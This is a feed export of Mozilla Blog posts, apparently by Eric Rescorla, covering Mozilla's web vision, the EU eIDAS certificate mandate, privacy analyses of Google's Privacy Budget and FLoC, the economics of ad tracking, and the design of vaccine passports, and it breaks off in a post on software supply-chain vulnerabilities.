Eric Rescorla, Author at The Mozilla Blog https://blog.mozilla.org/en/author/ekrmozilla-com/ News and Updates about Mozilla Wed, 23 Mar 2022 18:26:33 +0000 en-US hourly 1 https://wordpress.org/?v=6.3.5 The web is for everyone: Our vision for the evolution of the web https://blog.mozilla.org/en/mozilla/mozilla-webvision-future-of-web/ Wed, 23 Mar 2022 15:58:47 +0000 https://blog.mozilla.org/?p=68612 Over the last two decades, the web has woven itself into the fabric of our lives. What began as a research project has become the world’s most important communication platform and an essential tool for billions of people.  But despite its success — and sometimes because of it — the web has real problems. People […]

The post The web is for everyone: Our vision for the evolution of the web appeared first on The Mozilla Blog.

]]>
Over the last two decades, the web has woven itself into the fabric of our lives. What began as a research project has become the world’s most important communication platform and an essential tool for billions of people. 

But despite its success — and sometimes because of it — the web has real problems. People are routinely spied on by advertisers and oppressive governments, often at the moments when the open web is most necessary. They find themselves disempowered by hostile sites, sluggish experiences, and overly-complex technologies. And much of the web remains out of reach for non-native English speakers and people with disabilities.

Mozilla believes the web should be for everyone — open, empowering, and safe. In its best moments, the web exemplifies these values today. But too often the web today does not deliver on this promise. To that end, we’ve mapped out a detailed vision of the changes we want to see in the web in the years ahead, and the work we believe is necessary to achieve them. This includes efforts on a number of fronts — deploying ubiquitous encryption, ending tracking, simpler and faster technologies, next-generation internationalization support and much more.

We believe to make the web a better place we need to focus our work on these nine areas:

  • Protect user privacy: Essentially all user behavior on the web is subject to tracking and surveillance. A truly open and safe web requires that what people do remains private; this requires gradually shifting the ecosystem towards a new equilibrium without breaking the web in the process.
  • Protect users from malicious code: Users must be able to browse without fear that their devices will be compromised, and yet every web browser routinely has major security vulnerabilities. The technologies finally exist to significantly reduce this kind of security issue; we are increasing our use of them in Firefox and look forward to others doing the same.
  • Encrypt everything: All user communications should be encrypted. We are near the end of a long process to secure all HTTP traffic, and encryption needs to be retrofitted into existing legacy protocols such as DNS and built into all new protocols by default.
  • Extend the web… Safely: New capabilities make the web more powerful but also create new risks. The value added by new capabilities needs to be weighed against these risks; some applications may ultimately not be well suited for the web and that’s OK.
  • Make the web fast enough for any use: While web browsers are much faster now than they were five years ago, we still see major performance issues. Fixing these requires making both browsers and infrastructure faster, and also making it easier and more attractive for people to build fast sites.
  • Make it easy for anyone to publish on the web: While early websites were relatively simple and easy to build, the demands of performance and high production values have made the web increasingly daunting to work with. Our strategy is to categorize development techniques into increasing tiers of complexity, and then work to eliminate the usability gaps that push people up the ladder towards more complex approaches.
  • Give users the power to experience the web on their own terms: The web is for users. In order to fulfill that promise we need to ensure that they, not sites, control their experience, whether that means blocking ads or viewing content in accessible form. This requires building a browser that displays the web the way the user wants it — rather than just following instructions from the site — as well as strengthening the technical properties of web standards that enable this kind of reinterpretation.
  • Provide a first-class experience for non-English-speakers: The technical architecture and content ecosystem of the web both work best for North-American English speakers, who are a fraction of the world. We want the web to work well for everyone regardless of where they live and what languages they speak.
  • Improve accessibility for people with disabilities: As web experiences have grown richer, they’ve also become more difficult to use with assistive technology like screen readers. We want to reverse this trend.

You can read much more about each of these objectives in the full document. We’ve been using this roadmap to guide our work on Firefox and other Mozilla products. We also recognize that it’s a big web and fixing it is a team effort. We’re looking forward to working with others to build a better web.

The post The web is for everyone: Our vision for the evolution of the web appeared first on The Mozilla Blog.

]]>
The website security ecosystem protects individuals against fraud and state-sponsored surveillance. Let’s not break it. https://blog.mozilla.org/en/security/mozilla-eff-cybersecurity-experts-publish-letter-on-dangers-of-article-452-eidas-regulation/ Thu, 03 Mar 2022 21:44:08 +0000 https://blog.mozilla.org/?p=68528 Principle four of the Mozilla Manifesto states that “Individuals’ security and privacy on the internet are fundamental and must not be treated as optional.” We’ve made real progress on improving security on the Internet, but unfortunately, a draft law under discussion in the EU – the eIDAS Regulation – threatens to reverse that progress. Mozilla […]

The post The website security ecosystem protects individuals against fraud and state-sponsored surveillance. Let’s not break it. appeared first on The Mozilla Blog.

]]>
Principle four of the Mozilla Manifesto states that “Individuals’ security and privacy on the internet are fundamental and must not be treated as optional.” We’ve made real progress on improving security on the Internet, but unfortunately, a draft law under discussion in the EU – the eIDAS Regulation – threatens to reverse that progress. Mozilla and many others have been raising the alarm in the last few months. Today, leading cybersecurity experts are weighing in too, in an open letter to EU lawmakers that warns of the risks that eIDAS represents to web security.

Website certificates sit at the heart of web security. When you make a connection to a web site, say “mozilla.org”, that connection is protected with TLS, but TLS only protects the connection itself; each server has a certificate which ensures that the server on the other end is “mozilla.org” and not an attacker impersonating Mozilla. Certificates are issued by Certificate Authorities (CAs), who are responsible for verifying that a given entity controls the site in question. 

A malicious CA — or just one which did not have secure practices — could issue incorrect certificates which could then be used by attackers to attack people’s connections and steal their data. In order to ensure that CAs are held to high standards, each major browser and operating system maintains their own “Root Program,” which is responsible for vetting CAs to ensure that they have acceptable issuance practices, and, where necessary, removing CAs who do not adhere to those practices. For 18 years, Mozilla has operated its Root Program in the open, with published practices and where each proposed CA is considered on a public mailing list, ensuring that any stakeholder can be heard.

Proposed EU legislation threatens to disrupt this balance. Article 45.2 of the eIDAS Regulation mandates support for a new kind of certificate called a Qualified Website Authentication Certificate (QWAC). Under this regulation, QWACs would be issued by Trust Service Providers (another name for CAs), with those TSPs being approved not by the browsers but rather by the governments of individual EU member states. Browsers would be required to trust certificates issued by those TSPs regardless of whether they would meet Root Program security requirements, and without any way to remove misbehaving CAs. 

This change would weaken the security of the web by preventing browsers from protecting their users from the security risks – such as identity theft and financial fraud – that a misbehaving CA can expose them too. Worse, compelled inclusion of CAs in our root program would set a precedent for action by repressive regimes. We have already seen state actors (such as Kazakhstan) try to ramp up their surveillance capacities by forcing browsers to automatically trust their CAs — a dangerous practice that browsers and civil society organizations have successfully resisted so far, but if we set the precedent that web browser can’t hold CAs to appropriate security standards that could change quickly.

Technical experts at Mozilla, the Internet Society, the Electronic Frontier Foundation, as well as European civil society organisations have all spoken out about how these requirements would be bad for the web. Today, Mozilla and the EFF are publishing a letter signed by 38 cybersecurity experts about the danger of Article 45.2 to web security and recommendations for how lawmakers can avoid those dangers. The letter demonstrates that the cybersecurity community believes this provision is a threat to web security, creating more problems than it solves.   

The post The website security ecosystem protects individuals against fraud and state-sponsored surveillance. Let’s not break it. appeared first on The Mozilla Blog.

]]>
Analysis of Google’s Privacy Budget Proposal https://blog.mozilla.org/en/mozilla/google-privacy-budget-analysis/ Fri, 01 Oct 2021 16:00:00 +0000 https://blog.mozilla.org/?p=67487 Fingerprinting is a major threat to user privacy on the Web. Fingerprinting uses existing properties of your browser like screen size, installed add-ons, etc. to create a unique or semi-unique identifier which it can use to track you around the Web. Even if individual values are not particularly unique, the combination of values can be […]

The post Analysis of Google’s Privacy Budget Proposal appeared first on The Mozilla Blog.

]]>
Fingerprinting is a major threat to user privacy on the Web. Fingerprinting uses existing properties of your browser like screen size, installed add-ons, etc. to create a unique or semi-unique identifier which it can use to track you around the Web. Even if individual values are not particularly unique, the combination of values can be unique (e.g., how many people are running Firefox Nightly, live in North Dakota, have an M1 Mac and a big monitor, etc.)

This post discusses a proposal by Google to address fingerprinting called the Privacy Budget. The idea behind the Privacy Budget is to estimate the amount of information revealed by each piece of fingerprinting information (called a “fingerprinting surface”, e.g., screen resolution) and then limit the total amount of that information a site can obtain about you. Once the site reaches that limit (the “budget”), further attempts to learn more about you would fail, perhaps by reporting an error or returning a generic value. This idea has been getting a fair amount of attention and has been proposed as a potential privacy mitigation in some in-development W3C specifications.

While this seems like an attractive idea, our detailed analysis of the proposal raises questions about its feasibility.  We see a number of issues:

  • Estimating the amount of information revealed by a single surface is quite difficult. Moreover, because some values will be much more common than others, any total estimate is misleading. For instance, the Chrome browser has many users and so learning someone uses Chrome is not very identifying; by contrast, learning that someone uses Firefox Nightly is quite identifying because there are few Nightly users.
  • Even if we are able to set a common value for the budget, it is unclear how to determine whether a given set of queries exceeds that value. The problem is that these queries are not independent and so you can’t just add up each query. For instance, screen width and screen height are highly correlated and so once a site has queried one, learning the other is not very informative.
  • Enforcement is likely to lead to surprising and disruptive site breakage because sites will exceed the budget and then be unable to make API calls which are essential to site function. This will be exacerbated because the order in which the budget is used is nondeterministic and depends on factors such as the network performance of various sites, so some users will experience breakage and others will not.
  • It is possible that the privacy budget mechanism itself can be used for tracking by exhausting the budget with a particular pattern of queries and then testing to see which queries still work (because they already succeeded).

While we understand the appeal of a global solution to fingerprinting — and no doubt this is the motivation for the Privacy Budget idea appearing in specifications — the underlying problem here is the large amount of fingerprinting-capable surface that is exposed to the Web. There does not appear to be a shortcut around addressing that. We believe the best approach is to minimize the easy-to-access fingerprinting surface by limiting the amount of information exposed by new APIs and gradually reducing the amount of information exposed by existing APIs. At the same time, browsers can and should attempt to detect abusive patterns by sites and block those sites, as Firefox already does.

This post is part of a series of posts analyzing privacy-preserving advertising proposals.

For more on this:

Building a more privacy-preserving ads-based ecosystem

The future of ads and privacy

Privacy analysis of FLoC

Mozilla responds to the UK CMA consultation on google’s commitments on the Chrome Privacy Sandbox

Privacy analysis of SWAN.community and Unified ID 2.0

The post Analysis of Google’s Privacy Budget Proposal appeared first on The Mozilla Blog.

]]>
Privacy analysis of FLoC https://blog.mozilla.org/en/privacy-security/privacy-analysis-of-floc/ Thu, 10 Jun 2021 16:05:37 +0000 https://blog.mozilla.org/?p=66322 In a previous post, I wrote about a new set of technologies “Privacy Preserving Advertising”, which are intended to allow for advertising without compromising privacy. This post discusses one of those proposals–Federated Learning of Cohorts (FLoC)–which Chrome is currently testing. The idea behind FLoC is to make it possible to target ads based on the […]

The post Privacy analysis of FLoC appeared first on The Mozilla Blog.

]]>
In a previous post, I wrote about a new set of technologies “Privacy Preserving Advertising”, which are intended to allow for advertising without compromising privacy. This post discusses one of those proposals–Federated Learning of Cohorts (FLoC)–which Chrome is currently testing. The idea behind FLoC is to make it possible to target ads based on the interests of users without revealing their browsing history to advertisers. We have conducted a detailed analysis of FLoC privacy. This post provides a summary of our findings.

In the current web, trackers (and hence advertisers) associate a cookie with each user. Whenever a user visits a website that has an embedded tracker, the tracker gets the cookie and can thus build up a list of the sites that a user visits. Advertisers can use the information gained from tracking browsing history to target ads that are potentially relevant to a given user’s interests. The obvious problem here is that it involves advertisers learning everywhere you go. 

FLoC replaces this cookie with a new “cohort” identifier which represents not a single user but a group of users with similar interests. Advertisers can then build a list of the sites that all the users in a cohort visit, but not the history of any individual user. If the interests of users in a cohort are truly similar, this cohort identifier can be used for ad targeting. Google has run an experiment with FLoC; from that they’ve stated that FLoC provides 95% of the per-dollar conversion rate when compared to interest-based ad targeting using tracking cookies.

Our analysis shows several privacy issues that we believe need to be addressed:

Cohort IDs can be used for tracking

Although any given cohort is going to be relatively large (the exact size is still under discussion, but these groups will probably consist of thousands of users), that doesn’t mean that they cannot be used for tracking. Because only a few thousand people will share a given cohort ID, if trackers have any significant amount of additional information, they can narrow down the set of users very quickly. There are a number of possible ways this could happen:

Browser Fingerprinting

Not all browsers are the same. For instance, some people use Chrome and some use Firefox; some people are on Windows and others are on Mac; some people speak English and others speak French. Each piece of user-specific variation can be used to distinguish between users. When combined with a FLoC cohort that only has a few thousand users, a relatively small amount of information is required to identify an individual person or at least narrow the FLoC cohort down to a few people. Let’s give an example using some numbers that are plausible. Imagine you have a fingerprinting technique which divides people up into about 8000 groups (each group here is somewhat bigger than a ZIP code). This isn’t enough to identify people individually, but if it’s combined with FLoC using cohort sizes of about 10000, then the number of people in each fingerprinting group/FLoC cohort pair is going to be very small, potentially as small as one. Though there might be larger groups that can’t be identified this way, that is not the same as having a system that is free from individual targeting.

Multiple Visits

People’s interests aren’t constant and neither are their FLoC IDs. Currently, FLoC IDs seem to be recomputed every week or so. This means that if a tracker is able to use other information to link up user visits over time, they can use the combination of FLoC IDs in week 1, week 2, etc. to distinguish individual users. This is a particular concern because it works even with modern anti-tracking mechanisms such as Firefox’s Total Cookie Protection (TCP). TCP is intended to prevent trackers from correlating visits across sites but not multiple visits to one site. FLoC restores cross-site tracking even if users have TCP enabled. 

FLoC leaks more information than you want

With cookie-based tracking, the amount of information a tracker gets is determined by the number of sites it is embedded on. Moreover, a site which wants to learn about user interests must itself participate in tracking the user across a large number of sites, work with some reasonably large tracker, or work with other trackers. Under a permissive cookie policy, this type of tracking is straightforward using third-party cookies and cookie syncing. However, when third-party cookies are blocked (or isolated by site in TCP) it’s much more difficult for trackers to collect and share information about a user’s interests across sites.

FLoC undermines these more restrictive cookie policies: because FLoC IDs are the same across all sites, they become a shared key to which trackers can associate data from external sources. For example, it’s possible for a tracker with a significant amount of first-party interest data to operate a service which just answers questions about the interests of a given FLoC ID. E.g., “Do people who have this cohort ID like cars?”. All a site needs to do is call the FLoC APIs to get the cohort ID and then use it to look up information in the service. In addition, the ID can be combined with fingerprinting data to ask “Do people who live in France, have Macs, run Firefox, and have this ID like cars?” The end result here is that any site will be able to learn a lot about you with far less effort than they would need to expend today.

FLoC’s countermeasures are insufficient

Google has proposed several mechanisms to address these issues.

First, sites have the option of whether or not to participate in FLoC. In the current experiment that Chrome is conducting, sites are included in the FLoC computation if they do ads-type stuff, either “load ads-related resources” or call the FLoC APIs. It’s not clear what the eventual inclusion criteria are, but it seems likely that any site which includes advertising will be included in the computation by default. Sites can also opt-out of FLoC entirely using the Permissions-Policy HTTP header but it seems likely that many sites will not do so.

Second, Google itself will suppress FLoC cohorts which it thinks are too closely correlated with “sensitive” topics. Google provides the details in this whitepaper, but the basic idea is that they will look to see if the users in a given cohort are significantly more likely to visit a set of sites associated with sensitive categories, and if so they will just return an empty cohort ID for that cohort. Similarly, they say they will remove sites which they think are sensitive from the FLoC computation. These defenses seem like they are going to be very difficult to execute in practice for several reasons: (1) the list of sensitive categories may be incomplete or people may not agree on what categories are sensitive, (2) there may be other sites which correlate to sensitive sites but are not themselves sensitive, and (3) clever trackers may be able to learn sensitive information despite these controls. For instance: it might be the case that English-speaking users with FLoC ID X are no more likely to visit sensitive site type A, but French-speaking users are. 

While these mitigations seem useful, they seem to mostly be improvements at the margins, and don’t address the basic issues described above, which we believe require further study by the community.

Summary

FLoC is premised on a compelling idea: enable ad targeting without exposing users to risk. But the current design has a number of privacy properties that could create significant risks if it were to be widely deployed in its current form. It is possible that these properties can be fixed or mitigated — we suggest a number of potential avenues in our analysis — further work on FLoC should be focused on addressing these issues.

For more on this:

Building a more privacy-preserving ads-based ecosystem

The future of ads and privacy

Mozilla responds to the UK CMA consultation on google’s commitments on the Chrome Privacy Sandbox

Privacy analysis of SWAN.community and Unified ID 2.0

Analysis of Google’s Privacy Budget Proposal

The post Privacy analysis of FLoC appeared first on The Mozilla Blog.

]]>
The future of ads and privacy https://blog.mozilla.org/en/mozilla/the-future-of-ads-and-privacy/ Sat, 29 May 2021 02:45:31 +0000 https://blog.mozilla.org/?p=65769 The modern web is funded by advertisements. Advertisements pay for all those “free” services you love, as well as many of the products you use on a daily basis — including Firefox. There’s nothing inherently wrong with advertising: Mozilla’s Principle #9 states that “Commercial involvement in the development of the internet brings many benefits.” However, […]

The post The future of ads and privacy appeared first on The Mozilla Blog.

]]>
The modern web is funded by advertisements. Advertisements pay for all those “free” services you love, as well as many of the products you use on a daily basis — including Firefox. There’s nothing inherently wrong with advertising: Mozilla’s Principle #9 states that “Commercial involvement in the development of the internet brings many benefits.” However, that principle goes on to say that “a balance between commercial profit and public benefit is critical” and that’s where things have gone wrong: advertising on the web in many situations is powered by ubiquitous tracking of people’s activity on the web in a way that is deeply harmful to users and to the web as a whole.

Some Background

The ad tech ecosystem is incredibly complicated, but at its heart, the way that web advertising works is fairly simple. As you browse the web, trackers (mostly, but not exclusively advertisers), follow you around and build up a profile of your browsing history. Then, when you go to a site which wants to show you an ad, that browsing history is used to decide which of the potential ads you might see you actually get shown. 

The visible part of web tracking is creepy enough — why are those pants I looked at last week following me around the Internet? — but the invisible part is even worse: hundreds of companies you’ve never heard of follow you around as you browse and then use your data for their own purposes or sell it to other companies you’ve also never heard of. 

The primary technical mechanism used by trackers is what’s called “third party cookies”. A good description of third party cookies can be found here, a cookie is a piece of data that a website stores on your browser and can retrieve later. A third party cookie is a cookie which is set by someone other than the page you’re visiting (typically a tracker). The tracker works with the web site to embed some code from the tracker on their page (often this code is also responsible for showing ads) and that code sets a cookie for the tracker. Every time you go to a page the tracker is embedded on, it sees the same cookie and can use that to link up all the sites you go to. 

Cookies themselves are an important part of the web — they’re what let you log into sites, maintain your shopping carts, etc. However, third party cookies are used in a way that the designers of the web didn’t really intend and unfortunately, they’re now ubiquitous. While they have some legitimate uses, like federated login, they are mostly used for tracking user behavior.

Obviously, this is bad and it shouldn’t be a surprise to anybody who has followed our work in Firefox that we believe this needs to change. We’ve been working for years to drive the industry in a better direction. In 2015 we launched Tracking Protection, our first major step towards blocking tracking in the browser. In 2019 we turned on a newer version of our anti-tracking technology by default for all of our users. And we’re not the only ones doing this.

We believe all browsers should protect their users from tracking, particularly cookie-based tracking, and should be moving expeditiously to do so.

Privacy Preserving Advertising

Although third-party cookies are bad news, now that they are so baked into the web, it won’t be easy to get rid of them. Because they’re a dual-use technology with some legitimate applications, just turning them off (or doing something more sophisticated like Firefox Total Cookie Protection) can cause some web sites to break for users. Moreover, we have to be constantly on guard against new tracking techniques.

One idea that has gotten a lot of attention recently is what’s called “Privacy Preserving Advertising” (PPA) . The basic idea has a long history with systems such as Adnostic, PrivAd, and AdScale but has lately been reborn with proposals from Google, Microsoft, Apple, and Criteo, among others. The details are of course fairly complicated, but the general idea is straightforward: identify the legitimate (i.e., non-harmful) applications for tracking techniques and build alternative technical mechanisms for those applications without threatening user privacy. Once we have done that, it becomes much more practical to strictly limit the use of third party cookies.

This is a generally good paradigm: technology has advanced a lot since cookies were invented in the 1990s and it’s now possible to do many things privately that used to require just collecting user data. But, of course, it’s also possible to use technology to do things that aren’t so good (which is how we got into this hole in the first place). When looking at a set of technologies like PPA, we need to ask:

  1. Are the use cases for the technology actually good for users and for the web?
  2. Do these technologies improve user privacy and security? Are they collecting the minimal amount of data that is necessary to accomplish the task?
  3. Are these technologies being developed in an open standards process with input from all stakeholders?

Because this isn’t just one technology but rather a set of them, we should expect some pieces to be better than others. In particular, ad measurement is a use case that is important to the ecosystem, and we think that getting this one component right can drive value for consumers and engage advertising stakeholders. There’s overlap here with technologies like Prio which we already use in Firefox. On the other hand, we’re less certain about a number of the proposed technologies for user targeting, which have privacy properties that seem hard to analyze. This is a whole new area of technology, so we should expect it to be hard, but that’s also a reason to make sure we get it right.

What’s next?

Obviously, this is just the barest overview. In upcoming posts we’ll provide a more detailed survey of the space, covering the existing situation in more detail, some of the proposals on offer, and where we think the big opportunities are to improve things in both the technical and policy domains.

For more on this:

Building a more privacy preserving ads-based ecosystem

Privacy analysis of FLoC

Mozilla responds to the UK CMA consultation on google’s commitments on the Chrome Privacy Sandbox

Privacy analysis of SWAN.community and Unified ID 2.0

Analysis of Google’s Privacy Budget Proposal

The post The future of ads and privacy appeared first on The Mozilla Blog.

]]>
Notes on Implementing Vaccine Passports https://blog.mozilla.org/en/mozilla/leadership/notes-on-implementing-vaccine-passports/ Thu, 22 Apr 2021 22:54:00 +0000 https://blog.mozilla.org/foxtail/?p=65385 Now that we’re starting to get widespread COVID vaccination “vaccine passports” have started to become more relevant. The idea behind a vaccine passport is that you would have some kind of credential that you could use to prove that you had been vaccinated against COVID; various entities (airlines, clubs, employers, etc.) might require such a […]

The post Notes on Implementing Vaccine Passports appeared first on The Mozilla Blog.

]]>
Now that we’re starting to get widespread COVID vaccination “vaccine passports” have started to become more relevant. The idea behind a vaccine passport is that you would have some kind of credential that you could use to prove that you had been vaccinated against COVID; various entities (airlines, clubs, employers, etc.) might require such a passport as proof of vaccination. Right now deployment of this kind of mechanism is fairly limited: Israel has one called the green pass and the State of New York is using something called the Excelsior Pass based on some IBM tech.

Like just about everything surrounding COVID, there has been a huge amount of controversy around vaccine passports (see, for instance, this EFF post, ACLU post, or this NYT article).

There two seem to be four major sets of complaints:

  1. Requiring vaccination is inherently a threat to people’s freedom
  2. Because vaccine distribution has been unfair, with a number of communities having trouble getting vaccines, a requirement to get vaccinated increases inequity and vaccine passports enable that.
  3. Vaccine passports might be implemented in a way that is inaccessible for people without access to technology (especially to smartphones).
  4. Vaccine passports might be implemented in a way that is a threat to user privacy and security.

I don’t have anything particularly new to say about the first two questions, which aren’t really about technology but rather about ethics and political science, so, I don’t think it’s that helpful to weigh in on them, except to observe that vaccination requirements are nothing new: it’s routine to require children to be vaccinate to go to school, people to be vaccinated to enter certain countries, etc. That isn’t to say that this practice is without problems but merely that it’s already quite widespread, so we have a bunch of prior art here. On the other hand, the questions of how to design a vaccine passport system are squarely technical; the rest of this post will be about that.

What are we trying to accomplish?

As usual, we want to start by asking what we’re trying to accomplish At a high level, we have a system in which a vaccinated person (VP) needs to demonstrate to some entity (the Relying Party (RP)) that they have been vaccinated within some relevant time period. This brings with it some security requirements”

  1. Unforgeability: It should not be possible for an unvaccinated person to persuade the RP that they have been vaccinated.
  2. Information minimization: The RP should learn as little as possible about the VP, consistent with unforgeability.
  3. Untraceability: Nobody but the VP and RP should know which RPs the VP has proven their status to.

I want to note at this point that there has been a huge amount of emphasis on the unforgeability property, but it’s fairly unclear — at least to me — how important it really is. We’ve had trivially forgeable paper-based vaccination records for years and I’m not aware of any evidence of widespread fraud. However, this seems to be something people are really concerned about — perhaps due to how polarized the questions of vaccination and masks have become — and we have already heard some reports of sales of fake vaccine cards, so perhaps we really do need to worry about cheating. It’s certainly true that people are talking about requiring proof of COVID vaccination in many more settings than, for instance, proof of measles vaccination, so there is somewhat more incentive to cheat. In any case, the privacy requirements are a real concern.

In addition, we have some functional requirements/desiderata:

  1. The system should be cheap to bring up and operate.
  2. It should be easy for VPs to get whatever credential they need and to replace it if it is lost or destroyed.
  3. VPs should not be required to have some sort of device (e.g., a smartphone).

The Current State

In the US, most people who are getting vaccinated are getting paper vaccination cards that look like this:

This card is a useful record that you’ve been vaccinated, with which vaccine, and when you have to come back, but it’s also trivially forgeable. Given that they’re made of paper with effectively no anti-counterfeiting measures (not even the ones that are in currency), it would be easy to make one yourself, and there are already people selling them online. As I said above, it’s not clear entirely how much we ought to worry about fraud, but if we do, these cards aren’t up to the task. In any case, they also have sub-optimal information minimization properties: it’s not necessary to know how old you are or which vaccine you got in order to know whether you were vaccinated.

The cards are pretty good on the traceability front: nobody but you and the RP learns anything, and they’re cheap to make and use, without requiring any kind of device on the user’s side. They’re not that convenient if you lose them, but given how cheap they are to make, it’s not the worst thing in the world if the place you got vaccinated has to mail you a new one.

Improving The Situation

A good place to start is to ask how to improve the paper design to address the concerns above.

The data minimization issue is actually fairly easy to address: just don’t put unnecessary information on the card: as I said, there’s no reason to have your DOB or the vaccine type on the piece of paper you use for proof.

However, it’s actually not straightforward to remove your name. The reason for this is that the RP needs to be able to determine that the credential actually applies to you rather than to someone else. Even if we assume that the credential is tamper-resistant (see below), that doesn’t mean it belongs to you. There are really two main ways to address this:

  1. Have the VP’s name (or some ID number) on the credential and require them to provide a biometric credential (i.e., a photo ID) that proves they are the right person.
  2. Embed a biometric directly into the credential.

This should all be fairly familiar because it’s exactly the same as other situations where you prove your identity. For instance, when you get on a plane, TSA or the airline reads your boarding pass, which has your name, and then uses your photo ID to compare that to your face and decide if it’s really you (this is option 1). By contrast, when you want to prove you are licensed to drive, you present a credential that has your biometrics directly embedded (i.e., a drivers license).

This leaves us with the question of how to make the credential tamper-resistant. There are two major approaches here:

  1. Make the credential physically tamper-resistant
  2. Make the credential digitally tamper-resistant

Physically Tamper-Resistant Credentials

A physically tamper-resistant credential is just one which is hard to change or for unauthorized people to manufacture. This usually includes features like holograms, tamper-evident sealing (so that you can’t disassemble it without leaving traces) etc. Most of us have lot of experience with physically tamper-resistant credentials such as passports, drivers licenses, etc. These generally aren’t completely impossible to forge, but they’re designed to be somewhat difficult. From a threat model perspective, this is probably fine; after all we’re not trying to make it impossible to pretend to be vaccinated, just difficult enough that most people won’t try.

In principal, this kind of credential has excellent privacy because it’s read by a human RP rather than some machine. Of course, one could take a photo of it, but there’s no need to. As an analogy, if you go to a bar and show your driver’s license to prove you are over 21, that doesn’t necessarily create a digital record. Unfortunately for privacy, increasingly those kinds of previously analog admissions processes are actually done by scanning the credential (which usually has some machine readable data), thus significantly reducing the privacy benefit.

The main problem with a physically tamper-resistant credential is that it’s expensive to make and that by necessity you need to limit the number of people who can make it: if it’s cheap to buy the equipment to make the credential then it will also be cheap to forge. This is inconsistent with rapidly issuing credentials concurrently with vaccinating people: when I got vaccinated there were probably 25 staff checking people in and each one had a stack of cards. It’s hard to see how you would scale the production of tamper-resistant plastic cards to an operation like this, let alone to one that happens at doctors offices and pharmacies all over the country. It’s potentially possible that they could report people’s names to some central authority which then makes the cards, but even then we have scaling issues, especially if you want the cards to be available 2 weeks after vaccination. A related problem is that if you lose the card, it’s hard to replace because you have the same issuing problem.[1]

Digitally Tamper-Resistant Credentials

The major alternative here is to design a digitally tamper-resistant system. Effectively what this means is that the issuing authority digitally signs a credential. This provides cryptographically strong authentication of the data in the credential in such a way that anyone can verify it as long as they have the right software. The credential just needs to contain the same information as would be on the paper credential: the fact that you were vaccinated (and potentially a validity date) plus either your name (so you can show your photo id) or your identity (so the RP can directly match it against you).

This design has a number of nice properties. First, it’s cheap to manufacture: you can do the signing on a smartphone app.[2] It doesn’t need any special machinery from the RP: you can encode the credential as a 2-D bar code which the VP can show on their phone or print out. And they can make as many copies as they want, just like your airline boarding pass.

The major drawback of this design is that it requires special software on the RP side to read the 2D bar code, verify the digital signature, and verify the result. However, this software is relatively straightforward to write and can run on any smartphone, using the camera to read the bar code.[3] So, while this is somewhat of a pain, it’s not that big a deal.

This design also has generally good privacy properties: the information encoded in credential is (or at least can be) the minimal set needed to validate that you are you and that you are vaccinated, and because the credential can be locally verified, there’s no central authority which learns where you go. Or, at least, it’s not necessary for there to be a central authority: nothing stops the RP from reporting that you were present back to some central location, but that’s just inherent in them getting your name and picture. As far as I know, there’s no way to prevent that, though if the credential just contains your picture rather than an identifier, it’s somewhat better (though the code itself is still unique, so you can be tracked) especially because the RP can always capture your picture anyway.[4]

By this point you should be getting the impression that signed credentials are a pretty good design, and it’s no surprise that this seems to be the design that WHO has in mind for their smart vaccination certificate. They seem to envision encoding quite a bit more information than is strictly required for a “yes/no” decision and then having a “selective disclosure” feature that would just have that information and can be encoded in a bar code.

What about Green Pass, Excelsior Pass, etc?

So what are people actually rolling out in the field? The Israeli Green Pass seems to be basically this: a signed credential. It’s got a QR code which you read with an app and the app then displays the ID number and an expiration data. You then compare the ID number to the user’s ID to verify that they are the right person.

I’ve had a lot of trouble figuring out what the Excelsior Pass does. Based on the NY Excelsior Pass FAQ, which says that “you can print a paper Pass, take a screen shot of your Pass, or save it to the Excelsior Pass Wallet mobile app”, it sounds like it’s the same kind of thing as Green Pass, but that’s hardly definitive. I’ve been trying to get a copy of the specification for this technology and will report back if I manage to learn more.

What About the Blockchain?

Something that keeps coming up here is the use of blockchain for vaccine passports. You’ll notice that my description above doesn’t have anything about the blockchain but, for instance, the Excelsior Pass says it is built on IBM’s digital health pass which is apparently “built on IBM blockchain technology” and says “Protects user data so that it remains private when generating credentials. Blockchain and cryptography provide credentials that are tamper-proof and trusted.” As another example, in this webinar on the Linux Foundation’s COVID-19 Credentials Initiative, Kaliya Young answers a question on blockchain by saying that the root keys for the signers would be stored in the blockchain.

To be honest, I find this all kind of puzzling; as far as I can tell there’s no useful role for the blockchain here. To oversimplify, the major purpose of a blockchain is to arrange for global consensus about some set of facts (for instance, the set of financial transactions that has happened) but that’s not necessary in this case: the structure of a vaccine credential is that some health authority asserts that a given person have been vaccinated. We do need relying parties to know the set of health authorities, but we have existing solutions for that (at a high level, you just build the root keys into the verifying apps).[5] If anyone has more details on why a blockchain[6] is useful for this application I’d be interested in hearing them.

Is this stuff any good?

It’s hard to tell. As discussed above, some of these designs seem to be superficially sensible, but even if the overall design is sensible, there are lots of ways to implement it incorrectly. It’s quite concerning not to have published specifications for the exact structure of the credentials. Without having a detailed specification, it’s not possible to determine that it has the claimed security and privacy properties. The protocols that run the Web and the Internet are open which not only allows anyone to implement them, but also to verify their security and privacy properties. If we’re going to have vaccine passports, they should be open as well.

Updated: 2021-04-02 10:10 AM to point to Mozilla’s previous work on blockchain and identity.


  1. Of course, you could be issued multiple cards, as they’re not transferable. ↩
  2. There are some logistical issues around exactly who can sign: you probably don’t want everyone at the clinic to have a signing key, but you can have some central signer. ↩
  3. Indeed, in Santa Clara County, where I got vaccinated, your appointment confirmation is a 2D bar code which you print out and they scan onsite. ↩
  4. If you’re familiar with TLS, this is going to sound a lot like a digital certificate, and you might wonder whether revocation is a privacy issue the way that it is with WebPKI and OCSP. The answer is more or less “no”. There’s no real reason to revoke individual credentials and so the only real problem is revoking signing certificates. That’s likely to happen quite infrequently, so we can either ignore it, disseminate a certificate revocation list, or have central status checking just for them. ↩
  5. Obviously, you won’t be signing every credential with the root keys, but you use those to sign some other keys, building a chain of trust down to keys which you can use to sign the user credentials. ↩
  6. Because of the large amount of interest in blockchain technologies, there’s a tendency to try to sprinkle it in places it doesn’t help, especially in the identity space For that reason, it’s really important to ask what benefits it’s bringing. ↩

The post Notes on Implementing Vaccine Passports appeared first on The Mozilla Blog.

]]>
Notes on Addressing Supply Chain Vulnerabilities https://blog.mozilla.org/en/mozilla/leadership/notes-on-addressing-supply-chain-vulnerabilities/ Sat, 27 Feb 2021 20:47:00 +0000 https://blog.mozilla.org/foxtail/?p=65331 Addressing Supply Chain Vulnerabilities One of the unsung achievements of modern software development is the degree to which it has become componentized: not that long ago, when you wanted to write a piece of software you had to write pretty much the whole thing using whatever tools were provided by the language you were writing […]

